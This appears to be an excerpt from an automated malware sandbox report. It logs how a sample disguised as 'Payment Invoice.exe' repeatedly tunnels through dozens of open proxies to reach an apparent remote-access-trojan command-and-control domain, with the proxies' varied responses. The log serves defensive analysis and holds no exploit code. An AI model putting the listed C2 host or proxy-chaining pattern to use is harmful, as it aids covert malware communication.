                                                                Mar 11, 2024 16:15:28.841651917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1406192.168.2.454316129.213.150.20580807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.879800081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1407192.168.2.454285165.227.104.122260427076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.879800081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.480016947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.249017000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.777188063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.771775007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.683398008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.589462996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.290074110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:49.589303970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1408192.168.2.45429267.43.228.253242797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.880003929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:00.967526913 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1409192.168.2.45427067.43.227.227239737076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.880361080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1410192.168.2.452201192.111.139.16241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.880655050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1411192.168.2.454386104.19.124.112807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.880916119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.040172100 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1412192.168.2.454388104.25.234.81807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.880953074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.040096998 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1413192.168.2.454201111.90.150.10910807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.880990982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1414192.168.2.45422551.15.133.214163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.884974957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.589328051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.559539080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.386864901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.886763096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.343339920 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1415192.168.2.4542243.123.150.19231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.894671917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.198987007 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1416192.168.2.454443104.25.108.120807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.911456108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.065643072 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1417192.168.2.454430162.159.243.178807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.912782907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.073765993 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:20 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1418192.168.2.454251217.23.11.194471527076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.913024902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.207549095 CET226INHTTP/1.1 403 Forbidden
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Length: 101
                                                                Content-Type: text/plain; charset=utf-8
                                                                Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                                                Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1419192.168.2.454452185.238.228.96807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.921421051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.075736046 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1420192.168.2.454477104.22.14.48807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.931560993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.085825920 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1421192.168.2.454478104.19.217.219807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.931945086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.086420059 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1422192.168.2.454252147.75.34.85100117076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.932135105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.239402056 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1423192.168.2.454061120.194.4.157827076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.932266951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.887048006 CET319INHTTP/1.1 400 Bad Request
                                                                Server: openresty
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 170
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1424192.168.2.45437467.43.228.25318077076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.932456017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.710788012 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1425192.168.2.454234103.23.100.141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.950577974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1426192.168.2.454333121.182.138.71807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:20.950586081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1427192.168.2.454325103.113.71.23010807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
